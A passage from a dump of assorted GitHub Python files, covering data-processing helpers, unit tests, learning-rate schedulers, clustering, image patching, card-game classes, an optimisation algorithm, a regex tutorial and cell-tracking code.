\"\"\"\n\n path_to_vertex_metrics_folder = subnet_dir + 'snapshots/'\n\n snapshot_paths = glob.glob(path_to_vertex_metrics_folder + \\\n \"/vertex_metrics*.csv\")\n snapshots_dict = {}\n for path in snapshot_paths:\n\n # snapshot file name is key\n snapshot_key = path.split('snapshots/')[1].split('.csv')[0]\n snapshots_dict[snapshot_key] = pd.read_csv(path, 
index_col=0)\n\n return snapshots_dict\n\n\ndef get_snapshot_year(ing_year, active_years):\n \"\"\"\n Returns the smallest year greater than ing year\n \"\"\"\n return min([y for y in active_years if ing_year <= y])\n\n\ndef edge_is_present(G, source, target):\n \"\"\"\n Returns true of there is an edge from source to target\n\n Parameters\n source, target: igraph vertex indices\n\n G: directed igraph object\n \"\"\"\n return G.get_eid(v1=source, v2=target, directed=True, error=False) != -1\n\n\ndef standardize(X, center=False, scale=False):\n \"\"\"\n Standardizes a vector\n\n Parameters\n ---------\n cetner: to center or not to center (by mean)\n scale: to scale or not to scale (by standard deviation)\n \"\"\"\n mu = 0\n sigma = 1\n\n if center:\n mu = np.mean(X)\n\n if scale:\n sigma = np.std(X)\n\n return (X - mu)/sigma\n\n\ndef save_sparse_csr(filename, array):\n \"\"\"\n saves a sparse CSR matrix\n from http://stackoverflow.com/questions/8955448/save-load-scipy-sparse-csr-matrix-in-portable-data-format\n \"\"\"\n np.savez(filename, data=array.data, indices=array.indices,\n indptr=array.indptr, shape=array.shape)\n\n\ndef load_sparse_csr(filename):\n \"\"\"\n Loads a saved CSR matrix\n \"\"\"\n loader = np.load(filename)\n return csr_matrix((loader['data'], loader['indices'], loader['indptr']),\n shape=loader['shape'])\n","repo_name":"idc9/law-net","sub_path":"vertex_metrics_experiment/code/pipeline_helper_functions.py","file_name":"pipeline_helper_functions.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"41766444992","text":"from custom_exceptions.duplicate_customer_exception import DuplicateCustomerException\nfrom custom_exceptions.customer_not_found_exception import CustomerNotFoundException\nfrom data_access_layer.implementation_classes.account_postgres_dao_imp import AccountPostgresDAO\nfrom entities.accounts import Account\nfrom service_layer.implementation_services.account_postgres_service_imp import AccountPostgresServiceImp\n\naccount_dao = AccountPostgresDAO()\naccount_service = AccountPostgresServiceImp(account_dao)\n\nduplicate_account = Account(0, 'checking', 100.00, 1)\n\n\ndef test_duplicate_account_for_create_account():\n try:\n account_service.service_create_account(duplicate_account)\n assert False\n except DuplicateCustomerException as e:\n assert str(e) == \"That account has already been created\"\n\n\ndef test_not_found_for_get_all_customer_accounts_by_id():\n try:\n account_service.service_get_all_customer_accounts_by_id(100)\n assert False\n except CustomerNotFoundException as e:\n assert str(e) == \"This account was not found\"\n\n\ndef test_validate_delete_account_method():\n try:\n account_service.service_delete_account_by_id(1, 10)\n assert False\n except CustomerNotFoundException as e:\n assert str(e) == \"This account was not found\"\n","repo_name":"Alejandro-Fuste/python-bank-application","sub_path":"tests_for_app/postgres_tests/service_tests/test_account_service.py","file_name":"test_account_service.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74502964326","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 26 14:18:56 2017\n\n@author: RizMac\n\"\"\"\n\n\"\"\"\nCombine player and match data\nRun this AFTER Preprocessing.py\n\"\"\"\n\nimport pandas as pd #data processing\n\nMINIMUM_MATCHES = 
20\n\n\"\"\"\nFUNCTIONS\n\"\"\"\n\n#Determine whether radiant won the match\ndef getPlayerWin(radiantWin, playerSlot):\n if playerSlot < 5:\n radiant = True\n else:\n radiant = False\n \n return radiantWin == radiant\n\n#Join match table and players table\ndef joinPlayerMatches():\n matches = pd.read_csv('../DataSet/valid_matches.csv')\n players = pd.read_csv('../DataSet/valid_players.csv')\n \n players['start_time'] = 0\n players['duration'] = 0\n players['win'] = True\n \n current = 1.0;\n for index, row in matches.iterrows():\n matchCond = players['match_id'] == row['match_id']\n idx = players[matchCond].index\n \n players.loc[idx, 'start_time'] = row['start_time']\n players.loc[idx, 'duration'] = row['duration']\n players.loc[idx, 'win'] = row['radiant_win'] == (players.loc[idx, 'player_slot'] < 5)\n \n if current % 100 == 0:\n print(\"{:.2f}%\".format(((current / len(matches) * 100)))) \n \n current += 1.0\n \n #write to file\n players.to_csv('../DataSet/valid_player_match.csv', index=False, mode='w')\n\n#Aggregate players from multiple matches\ndef aggregatePlayers():\n playerMatches = pd.read_csv('../DataSet/valid_player_match.csv')\n \n #group rows by account_id\n playerList = [] \n aggregatePlayers = playerMatches.groupby('account_id')\n for id, group in aggregatePlayers:\n matchesPlayed = len(group)\n if matchesPlayed >= MINIMUM_MATCHES:\n #aaggregate data\n gold = group['gold'].mean() + group['gold_spent'].mean() \n gpm = group['gold_per_min'].mean()\n xpm = group['xp_per_min'].mean()\n kills = group['kills'].mean()\n deaths = group['deaths'].mean()\n assists = group['assists'].mean()\n denies = group['denies'].mean()\n lastHits = group['last_hits'].mean()\n stuns = group['stuns'].mean()\n heroDamage = group['hero_damage'].mean()\n towerDamage = group['tower_damage'].mean()\n level = group['level'].mean()\n goldStructure = group['gold_destroying_structure'].mean()\n goldHeros = group['gold_killing_heros'].mean()\n goldCreeps = group['gold_killing_creeps'].mean()\n position = group['position'].mean()\n duration = group['duration'].mean()\n winRate = group['win'].mean()\n gamesPlayed = len(group)\n \n dataPoint = [id, gold, gpm, xpm, kills, deaths, assists, denies, \n lastHits, stuns, heroDamage, towerDamage, level, \n goldStructure, goldHeros, goldCreeps, position, \n duration, winRate, gamesPlayed] \n playerList.append(dataPoint)\n \n #create DataFrame\n columns = ['id', 'gold', 'gpm', 'xpm', 'kills', 'deaths', 'assists', \n 'denies', 'lastHits', 'stuns', 'hero damage', 'tower damage', \n 'level', 'gold from structure', 'gold from hero kills', \n 'gold from creeps', 'average team position', 'duration', \n 'win rate', 'total matches']\n \n playerFrame = pd.DataFrame(playerList, columns=columns) \n \n #save DataFrame to csv\n playerFrame.to_csv('../DataSet/valid_player_dataset.csv', index=False, mode='w')\n\n#check contents of valid_player_match \ndef checkPlayerMatches():\n playerMatches = pd.read_csv('../DataSet/valid_player_match.csv')\n print(playerMatches[:3])\n\n#check contents of valid_player_dataset\ndef checkValidPlayerDataset():\n dataset = pd.read_csv('../DataSet/valid_player_dataset.csv')\n print(dataset[:3])\n print(dataset.shape)\n \n\n\n\n\"\"\"\nRUN 
PROGRAM\n\"\"\"\n\n#checkPlayerMatches()\n#aggregatePlayers()\ncheckValidPlayerDataset()\n","repo_name":"RizRam/DOTA-2-Machine-Learning-Project","sub_path":"Dota2ML/Aggregate.py","file_name":"Aggregate.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23522676687","text":"import pytest\n\n\ndef test_cors_get_cors_headers(dummy_request):\n from snovault.cors import get_cors_headers\n assert dummy_request.response.headerlist == [\n ('Content-Type', 'text/html; charset=UTF-8'),\n ('Content-Length', '0')\n ]\n headers = {\n 'Access-Control-Allow-Origin': 'some-origin.com',\n 'Vary': 'Origin',\n 'Other': 'Header',\n 'Set-Cookie': 'xyz'\n }\n dummy_request.response.headers.update(headers)\n for header in headers:\n assert header in dummy_request.response.headers\n cors_headers = get_cors_headers(dummy_request)\n assert len(cors_headers) == 2\n assert cors_headers['Access-Control-Allow-Origin'] == 'some-origin.com'\n assert cors_headers['Vary'] == 'Origin'\n","repo_name":"IGVF-DACC/snovault","sub_path":"src/snovault/tests/test_cors.py","file_name":"test_cors.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15582977640","text":"from torch.optim.lr_scheduler import (LinearLR, ExponentialLR, SequentialLR,\n ReduceLROnPlateau,\n EPOCH_DEPRECATION_WARNING)\nimport warnings\nimport torch\n\nfrom typing import List\n\n\nclass WarmupSequentialLR(SequentialLR):\n\n def __init__(\n self,\n optimizer: torch.optim.Optimizer,\n start_factor: float = 0.01,\n end_factor: float = 1,\n total_iters: int = 10,\n gamma: float = 0.995,\n milestones: List[int] = None,\n ):\n\n if milestones is None:\n milestones = [1000]\n\n linear_lr = LinearLR(optimizer,\n start_factor=start_factor,\n end_factor=end_factor,\n total_iters=total_iters)\n\n exponential_lr = ExponentialLR(optimizer, gamma=gamma)\n super().__init__(optimizer, [linear_lr, exponential_lr],\n milestones=milestones)\n\n\nclass ReduceLROnPlateauWithWarmup(ReduceLROnPlateau):\n \"\"\"\n Modified ReduceLROnPlateau, which allows a warmup phase at\n the beginning of training.\n\n Having a warmup phase is useful so we can train the model\n with a high learning rate, without having to worry about\n the learning rate being too high and causing the model to\n diverge in the first few steps.\n \"\"\"\n\n def __init__(self, warmup_epochs: int = 10, **kwargs):\n \"\"\"\n Args:\n warmup_epochs: Number of epochs to use for the warmup phase.\n patience: Number of epochs to wait before reducing the learning rate.\n factor: Factor by which to reduce the learning rate.\n \"\"\"\n # Set default patience\n if 'patience' not in kwargs:\n kwargs['patience'] = 100\n\n # Set default factor\n if 'factor' not in kwargs:\n kwargs['factor'] = 0.8\n\n super().__init__(**kwargs)\n self.warmup_epochs = warmup_epochs\n\n # Set the initial learning rate\n self._initial_step()\n\n def _initial_step(self):\n for i, param_group in enumerate(self.optimizer.param_groups):\n param_group['lr'] = param_group['lr'] / 10\n self.initial_lr = [\n float(param_group['lr'])\n for i, param_group in enumerate(self.optimizer.param_groups)\n ]\n self._last_lr = [group['lr'] for group in self.optimizer.param_groups]\n\n def step(self, metrics: float | torch.Tensor, epoch=None):\n # convert `metrics` to float, in case it's a zero-dim Tensor\n current = float(metrics)\n if epoch is None:\n epoch = 
self.last_epoch + 1\n else:\n warnings.warn(EPOCH_DEPRECATION_WARNING, UserWarning)\n self.last_epoch = epoch\n\n if self.is_better(current, self.best):\n self.best = current\n self.num_bad_epochs = 0\n else:\n self.num_bad_epochs += 1\n\n if self.in_cooldown:\n self.cooldown_counter -= 1\n self.num_bad_epochs = 0 # ignore any bad epochs in cooldown\n\n if self.last_epoch < self.warmup_epochs:\n self._increase_lr(epoch)\n self.cooldown_counter = self.cooldown\n self.num_bad_epochs = 0\n\n if self.num_bad_epochs > self.patience:\n self._reduce_lr(epoch)\n self.cooldown_counter = self.cooldown\n self.num_bad_epochs = 0\n\n self._last_lr = [group['lr'] for group in self.optimizer.param_groups]\n\n def _increase_lr(self, epoch):\n for i, (param_group, initial_lr) in enumerate(\n zip(self.optimizer.param_groups, self.initial_lr)):\n old_lr = float(param_group['lr'])\n new_lr = old_lr + initial_lr\n param_group['lr'] = new_lr\n if self.verbose:\n epoch_str = (\"%.2f\"\n if isinstance(epoch, float) else \"%.5d\") % epoch\n print('Epoch {}: increasing learning rate'\n ' of group {} to {:.4e}.'.format(epoch_str, i, new_lr))\n","repo_name":"BlauGroup/NanoParticleTools","sub_path":"src/NanoParticleTools/machine_learning/util/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"19258935229","text":"\n\nfrom __future__ import print_function\nimport numpy as np\nimport scipy.linalg as sl\nimport pandas as pd\nimport sklearn.cluster as skc\nimport sklearn.metrics as sm\nfrom sklearn import metrics\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.preprocessing import StandardScaler\n\n\ngalNum = 25\na = '0.490'\nnumClouds = 3\nloT, hiT = 10**4, 10**4.5\nloN, hiN = 10**-5, 10**-4.5\nbaseLoc = '/home/jacob/research/velas/vela2b/vela{0:d}/a{1:s}/'\nbaseLoc = '/mnt/cluster/abs/cgm/vela2b/vela{0:d}/a{1:s}/'\n\ngalNums = range(21,30)\nexpns = ['0.490']*len(galNums)\nexpns[galNums.index(24)] = '0.450'\n\nfor galNum, a in zip(galNums, expns):\n\n print('\\nGalaxy = {0:d}:'.format(galNum))\n dataloc = baseLoc.format(galNum,a)\n boxfile = '{0:s}vela2b-{1:d}_GZa{2:s}.h5'.format(dataloc,galNum,a)\n # Read in the data and select out the cloud\n d = pd.read_hdf(boxfile, 'data')\n cloudInds = ( (d['temperature']<hiT) & (d['temperature']>loT) & \n (d['density']<hiN) & (d['density']>loN) )\n df = d[cloudInds]\n dataset = df[['x','y','z']]\n dloc = dataset.as_matrix()\n\n # Peform the kmean clustering\n #km = skc.KMeans(n_clusters=numClouds)\n #km.fit(dloc)\n #labels = km.labels_\n #results = pd.DataFrame([dataset.index,labels]).T\n\n # Check the fit with the Silhouette score\n #sm.silhouette_score(dloc, labels, metric='euclidean')\n\n # Compute the clustering using DBSCAN\n db = skc.DBSCAN(eps=0.3,min_samples=10).fit(dloc)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n labels = db.labels_\n\n # Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n\n print('Estimated number of clusters: %d' % n_clusters_)\n #print(\"Silhouette Coefficient: %0.3f\" % metrics.silhouette_score(dloc, 
labels))\n\n\n\n","repo_name":"jrvliet/analysis","sub_path":"metallicity/cloud_clustering.py","file_name":"cloud_clustering.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23321311463","text":"import numpy as np\nimport pylab as plt\nimport matplotlib as mpl\n\n\n\ndef slice_into_patches_with_overlap(image, patchsize=1024, slack=32):\n '''Slices a numpy array image into overlapping patches of size `patchsize`'''\n grid = grid_for_patches(image.shape, patchsize, slack)\n patches = [image[i0:i1, j0:j1] for i0,j0,i1,j1 in grid.reshape(-1, 4)]\n return patches\n\ndef stitch_overlapping_patches(patches, imageshape, slack=32, out=None):\n '''Merges the patches as returned by `slice_into_patches_with_overlap` back into the original shape'''\n patchsize = patches[0].shape[0]\n grid = grid_for_patches(imageshape, patchsize, slack)\n halfslack = slack//2\n i0,i1 = (grid[grid.shape[0]-2,grid.shape[1]-2,(2,3)] - grid[-1,-1,(0,1)])//2\n d0 = np.stack( np.meshgrid( [0]+[ halfslack]*(grid.shape[0]-2)+[ i0]*(grid.shape[0]>1),\n [0]+[ halfslack]*(grid.shape[1]-2)+[ i1]*(grid.shape[1]>1), indexing='ij' ), axis=-1 )\n d1 = np.stack( np.meshgrid( [-halfslack]*(grid.shape[0]-1)+[imageshape[0]], \n [-halfslack]*(grid.shape[1]-1)+[imageshape[1]], indexing='ij' ), axis=-1 )\n d = np.concatenate([d0,d1], axis=-1)\n if out is None:\n out = np.zeros(imageshape[:2]+patches[0].shape[2:])\n for patch,gi,di in zip(patches, d.reshape(-1,4), (grid+d).reshape(-1,4)):\n out[di[0]:di[2], di[1]:di[3]] = patch[gi[0]:gi[2], gi[1]:gi[3]]\n return out\n\ndef grid_for_patches(imageshape, patchsize, slack):\n #helper function for slicing and stitching\n H,W = imageshape[:2]\n stepsize = patchsize - slack\n grid = np.stack( np.meshgrid( np.minimum( np.arange(patchsize, H+stepsize, stepsize), H ), \n np.minimum( np.arange(patchsize, W+stepsize, stepsize), W ), indexing='ij' ), axis=-1 )\n grid = np.concatenate([grid-patchsize, grid], axis=-1)\n grid = np.maximum(0, grid)\n return grid\n \ndef draw_box(box, color='w', linewidth=None):\n '''Convenience function to draw a box (shape:(4,)) on a matplotlib/pylab plot'''\n axes = plt.gca()\n rect = mpl.patches.Rectangle(box[:2], *(box[2:]-box[:2]), linewidth=linewidth, edgecolor=color, facecolor='none')\n axes.add_patch( rect )","repo_name":"alexander-g/Cell-Detection-for-Wood-Anatomy","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36362969464","text":"\"\"\"\nOnce we have seen how to check whether a string matches a pattern, we may want to extract parts of that pattern, for \nexample, the digits of a date (day, month and year). \n\nOnce again, Java's regular expressions help us. Let's change the example. We want to extract the summands and the\nresult from a string like \"xxxx+yyyy=zzzzz\", where x, y and z represent digits and there may be any number of them.\n \nWith \\d+ we indicate one or more digits. The regular expression to check whether a string matches that pattern could be \n\"\\d+\\+\\d+=\\d+\". 
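\n\nFor example, a quick way to try the pattern against a couple of strings (a minimal sketch; re.fullmatch is used here as one way to test the whole string):\n\n import re\n # matches: the whole string is digits '+' digits '=' digits\n assert re.fullmatch(r\"\\d+\\+\\d+=\\d+\", \"23+12=35\") is not None\n # no match: the '=' part is missing\n assert re.fullmatch(r\"\\d+\\+\\d+=\\d+\", \"23+12\") is None\n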
\n\nSince the + has a special meaning in patterns -it means one or more-, to check for a \"+\" in the string\nwe have to \"escape\" it, hence the \\ in front.\n\nThe parts we want to extract must be enclosed in parentheses.\n\nSo the regular expression becomes \"(\\d+)\\+(\\d+)=(\\d+)\".\n\nSource: http://chuwiki.chuidiang.org/index.php?title=Expresiones_Regulares_en_Java\n\nAuthor: Rafael del Castillo Gomariz\n\"\"\"\n\nimport re\n\nstr_to_analyze = \"23+12=35\"\nregex = \"(\\d+)\\+(\\d+)=(\\d+)\"\nmatch = re.search(regex, str_to_analyze)\n\n# Look for the parts (these will be 23, 12 and 35)\nfor n in match.groups():\n print(n)\n\n\"\"\"\nIn the string “<a>uno</a><b>dos</b><c>tres</c>” we want to use regular expressions to extract the pieces between \nthe <a>, <b> and <c> tags, that is, \"uno\", \"dos\" and \"tres\".\n\"\"\"\n\nregex = \"<[^>]*>([^<]*)</[^>]*>\"\nstr_to_analyze = \"<a>uno</a><b>dos</b><c>tres</c>\"\nfor str_ in re.findall(regex, str_to_analyze):\n print(str_)\n","repo_name":"rdelcastillo/DAW-Python","sub_path":"ejemplosclase/7expresionesregulares/ejemplo2.py","file_name":"ejemplo2.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"3283947896","text":"class Card(object):\n '''a single card'''\n RANKS = ['A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']\n SUITS = ['c', 'd', 'h', 's']\n def __init__(self, rank, suit):\n self.__rank = rank\n self.__suit = suit\n def __str__(self):\n rep = self.__rank + self.__suit\n return rep\n\nclass Hand(object):\n '''one player's hand'''\n def __init__(self):\n self.cards = []\n def __str__(self):\n if self.cards:\n rep = ''\n for card in self.cards:\n rep += str(card) + '\\t'\n else:\n rep = '<empty>'\n return rep\n def clear(self):\n self.cards = []\n def add(self, card):\n self.cards.append(card)\n def give(self, other_hand, card):\n self.cards.remove(card)\n other_hand.add(card)\n\nclass Deck(Hand):\n def populate(self):\n self.cards = []\n for suit in Card.SUITS:\n for rank in Card.RANKS:\n self.add(Card(rank, suit))\n def shuffle(self):\n import random\n random.shuffle(self.cards)\n def deal(self, hands, per_hand = 1):\n for rounds in range(per_hand):\n for hand in hands:\n if self.cards:\n top_card = self.cards[0]\n self.give(hand, top_card)\n else:\n print('the deck has run out of cards!!!')\n\nclass Unprintable_card(Card):\n def __str__(self):\n rep = '<cannot be printed>'\n return rep\n\nclass Positionable_card(Card):\n def __init__(self, rank, suit, face_up = True):\n super().__init__(rank, suit)\n self.is_face_up = face_up\n def __str__(self):\n if self.is_face_up:\n rep = super().__str__()\n else:\n rep = 'XX'\n return rep\n def flip(self):\n self.is_face_up = not self.is_face_up\n\ndef main():\n card1 = Card(rank = 'A', suit = 'h')\n card2 = Unprintable_card(rank = 'A', suit = 'q')\n card3 = Positionable_card(rank = 'A', suit = 'c')\n\n print('printing CARD')\n print(card1)\n print('printing Unprintable_card')\n print(card2)\n print('printing Positionable_card')\n print(card3)\n print('flipping')\n card3.flip()\n print('printing Positionable_card again')\n 
print(card3)\n\n\nmain()\n","repo_name":"aomay/python_M.Douson","sub_path":"9/black_jack_2.0/cards3.0.py","file_name":"cards3.0.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41757403942","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 16 17:25:39 2017\r\n\r\n@author: BHANU\r\n\"\"\"\r\n\r\nimport math\r\nimport random\r\n\r\n\r\ndef init_pop(n_var,n_pop,rang):\r\n pop = []\r\n for i in range (n_pop):\r\n contry = []\r\n for j in range (n_var):\r\n new_val = rang[j][0] + random.random()*(rang[j][1] - rang[j][0])\r\n contry.extend([new_val])\r\n pop.append(contry)\r\n return pop\r\n\r\ndef init_range(n_var):\r\n rang = []\r\n for i in range(n_var):\r\n low = 0\r\n high = 10\r\n rang.append([low,high])\r\n return rang\r\n \r\ndef func1(contry,min_max):\r\n val = contry[0]*math.sin(contry[0]*4) + 1.1*contry[1]*math.sin(2*contry[1])\r\n if (min_max == 1):\r\n return (1/(1+val))\r\n else:\r\n return val\r\n\r\ndef evaluate(pop,min_max):\r\n vals = []\r\n for cont in pop:\r\n vals.extend([func1(cont,min_max)])\r\n return vals\r\n\r\n \r\n\r\ndef ranking(eval_val,n_imp):\r\n top = []\r\n ac_max = max(eval_val)\r\n for i in range(n_imp+1):\r\n max_v = ac_max\r\n curr_ind = 0\r\n for j in range(len(eval_val)):\r\n if (j in top):\r\n continue\r\n else:\r\n if (eval_val[j]<max_v):\r\n curr_ind = j\r\n max_v = eval_val[j]\r\n top.extend([curr_ind])\r\n return top\r\n\r\n \r\ndef n_cost(eval_val,n_imp,top):\r\n cost = []\r\n for i in range(n_imp+1):\r\n cost.extend([eval_val[top[i]]])\r\n max1 = max(cost)\r\n new_cost = []\r\n for i in range(n_imp+1):\r\n new_cost.extend([abs(eval_val[top[i]]-max1)])\r\n prob = []\r\n sum1 = sum(new_cost)\r\n for i in range(n_imp):\r\n if (i==0):\r\n prob.extend([(new_cost[i])/sum1])\r\n else:\r\n prob.extend([((new_cost[i])/sum1)+prob[i-1]])\r\n return prob\r\n\r\n\r\ndef col_div(prob,top,n_pop,n_imp):\r\n col = []\r\n for i in range (n_pop):\r\n if (i in top):\r\n col.extend([i])\r\n else:\r\n rand = random.random()\r\n for j in range(n_imp):\r\n if (rand<prob[j]):\r\n col.extend([top[j]])\r\n break\r\n \r\n col_sort = []\r\n for i in top:\r\n new_emp = []\r\n for j in range(n_pop):\r\n if (j in top):\r\n continue\r\n else:\r\n if (col[j]==i):\r\n new_emp.extend([j])\r\n col_sort.append(new_emp)\r\n return col_sort\r\n\r\ndef update_emp(pop,n_var,n_imp,beta,col_emp,imp,min_max,rang):\r\n i = 0\r\n for col in col_emp:\r\n k=0\r\n new_imp_ind = imp[i]\r\n temp = k\r\n for cont in col:\r\n new_cont = []\r\n j=0\r\n for var in pop[cont]:\r\n t_val = (var + random.random()*beta*(pop[imp[i]][j]-var))\r\n if (t_val>rang[j][1]):\r\n t_val = rang[j][1]\r\n if (t_val<rang[j][0]):\r\n t_val = rang[j][0]\r\n new_cont.extend([t_val])\r\n j+=1\r\n pop[cont] = new_cont\r\n if(func1(pop[cont],min_max) < func1(pop[new_imp_ind],min_max)):\r\n new_imp_ind = cont\r\n temp = k\r\n k += 1\r\n if (new_imp_ind != imp[i]):\r\n temp1 = imp[i]\r\n imp[i] = new_imp_ind\r\n col[temp] = temp1\r\n i += 1\r\n \r\n return pop\r\n \r\ndef cost_emp(pop,imp,col_emp,eta,min_max):\r\n i=0\r\n t_cost = []\r\n for col in col_emp:\r\n cost_col =0\r\n for cont in col:\r\n cost_col += func1(pop[cont],min_max)\r\n t_cost.extend([func1(pop[imp[i]],min_max) + eta*cost_col])\r\n i += 1\r\n \r\n return t_cost\r\n\r\n\r\ndef pro_emp(t_cost,n_imp):\r\n max1 = max(t_cost)\r\n new_cost = []\r\n for c in t_cost:\r\n new_cost.extend([abs(c - max1)])\r\n \r\n sum1 = sum(new_cost)\r\n prob = []\r\n 
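# Build a cumulative (roulette-wheel) probability vector over the empires:\r\n # prob[i] holds the running sum of the normalized costs, so a single uniform\r\n # draw in [0, 1) later picks an empire with probability equal to its share.\r\n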
\r\n for i in range(n_imp):\r\n if (i==0):\r\n prob.extend([(new_cost[i])/sum1])\r\n else:\r\n prob.extend([((new_cost[i])/sum1)+prob[i-1]])\r\n \r\n return prob\r\n\r\n\r\n# Initial variables\r\n\r\nmax_iter = 1000\r\nN_pop = 50\r\nN_imp = 5\r\nN_var = 2\r\nbeta = 1.5\r\neta = 0.1\r\nmin_max = 0\r\n\r\nvar_range = init_range(N_var)\r\nemp_pop = init_pop(N_var,N_pop,var_range)\r\n\r\nvals = evaluate(emp_pop,min_max)\r\n\r\nimps = ranking(vals,N_imp)\r\n\r\nimp_pro = n_cost(vals, N_imp, imps)\r\n\r\ndel imps[-1]\r\n\r\ncolonies = col_div(imp_pro,imps,N_pop, N_imp)\r\n\r\n\r\nw_emp = 0\r\nb_emp = 0\r\n\r\nfor it in range(max_iter):\r\n if(N_imp == 1):\r\n break\r\n emp_pop = update_emp(emp_pop, N_var, N_imp, beta, colonies, imps, min_max, var_range)\r\n cost_emps = cost_emp(emp_pop, imps, colonies, eta, min_max)\r\n t1 = max(cost_emps)\r\n t2 = min(cost_emps)\r\n c2 = 0\r\n for c1 in cost_emps:\r\n if t1 == c1:\r\n w_emp = c2\r\n if t2 == c1:\r\n b_emp = c2\r\n c2 += 1\r\n \r\n pros_emps = pro_emp(cost_emps,N_imp)\r\n del1 = 0\r\n \r\n if (len(colonies[w_emp])==1):\r\n temp_cont = colonies[w_emp][0]\r\n colonies.pop(w_emp)\r\n del1 = 1\r\n \r\n else: \r\n #print(\"w_emp = \",w_emp)\r\n lst_cont = func1(emp_pop[colonies[w_emp][0]], min_max)\r\n l_ind = 0\r\n d_ind = 0\r\n for col in colonies[w_emp]:\r\n if (lst_cont > func1(emp_pop[col], min_max)):\r\n l_ind = d_ind\r\n lst_cont = func1(emp_pop[col], min_max)\r\n d_ind += 1\r\n \r\n temp_cont = colonies[w_emp][l_ind]\r\n colonies[w_emp].pop(l_ind)\r\n \r\n \r\n rand1 = random.random()\r\n \r\n p_ind = 0\r\n for p in pros_emps:\r\n if (rand1<p):\r\n colonies[p_ind].extend([temp_cont])\r\n break\r\n p_ind += 1\r\n \r\n if (del1 == 1):\r\n N_imp -= 1\r\n temp_cont = imps[w_emp]\r\n imps.pop(w_emp)\r\n p_ind = 0\r\n for p in pros_emps:\r\n if (rand1<p):\r\n colonies[p_ind].extend([temp_cont])\r\n break\r\n p_ind += 1\r\n #print(pros_emps)\r\n\r\nprint(emp_pop[imps[b_emp]])\r\nprint(func1(emp_pop[imps[b_emp]],min_max))\r\n\r\n","repo_name":"Wrekkers/Evo_Optimiztion","sub_path":"Optimized_Algo.py","file_name":"Optimized_Algo.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36879914729","text":"# -*- coding: utf-8 -*-\n\n'''\nExchange-related constants\nAll names are prefixed with EXCHANGE_\n'''\n\n# Shanghai Stock Exchange\nEXCHANGE_SHANGHAI = 'XSHG'\n# Shenzhen Stock Exchange\nEXCHANGE_SHENZHEN = 'XSHE'\n\n# market open\nEXCHANGE_OPNE = 1\n# market closed\nEXCHANGE_CLOSE = 0\n\n# market calendar periods\n# end of week, end of month, end of year\nEXCHANGE_WEEKEND = EXCHANGE_MONTHEND = EXCHANGE_YEAREND = 1\n# not an end of week, month or year\nEXCHANGE_NO_END = 0\n\n# A shares\nEXCHANGE_STOCK_TYPE_A = 1\n# B shares\nEXCHANGE_STOCK_TYPE_B = 2\n\n# board the stock belongs to\n# main board\nEXCHANGE_BOARD_MAIN = 1\n# growth enterprise market (ChiNext)\nEXCHANGE_BOARD_GEM = 2\n# small and medium enterprise board\nEXCHANGE_BOARD_SMSE = 3\n\n\n# stock status\n# trading normally\nEXCHANGE_STOCK_STATUS_NORMAL = 1\n# suspended\nEXCHANGE_STOCK_STATUS_STOP = -1\n\n","repo_name":"esonger/stock","sub_path":"p_stock/global_var/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7660147496","text":"import numpy as np\nfrom munkres import Munkres\nfrom scipy.spatial.distance import directed_hausdorff\n\nfrom ..tools.tools import printfancy\n\n\ndef greedy_tracking(TLabels, TCenters, xyresolution, zresolution, track_args):\n dist_th = track_args[\"dist_th\"]\n z_th = track_args[\"z_th\"]\n\n z_th_units = int(np.rint(z_th / zresolution))\n FinalLabels = []\n FinalCenters = []\n label_correspondance = []\n # for each 
time track to the previous one\n for t in range(len(TLabels)):\n label_correspondance.append([])\n # if the first time, labels remain the same\n if t == 0:\n FinalLabels.append(TLabels[0])\n FinalCenters.append(TCenters[0])\n labmax = np.max(FinalLabels[0])\n for lab in TLabels[0]:\n label_correspondance[0].append([lab, lab])\n continue\n\n # if not first time, we need to fill the correspondance\n FinalLabels.append([])\n FinalCenters.append([])\n # pre-allocate distance matrix of shape [labs at t-1, labs at t]\n Dists = np.ones((len(FinalLabels[t - 1]), len(TLabels[t])))\n\n # for each label at t-1\n for i in range(len(FinalLabels[t - 1])):\n # position of ith cell at t-1\n poscell1 = np.array(FinalCenters[t - 1][i][1:]) * np.array(\n [xyresolution, xyresolution]\n )\n\n # for each cell at t\n for j in range(len(TLabels[t])):\n # position of jth cell at t\n poscell2 = np.array(TCenters[t][j][1:]) * np.array(\n [xyresolution, xyresolution]\n )\n\n # compute distance between the two\n Dists[i, j] = 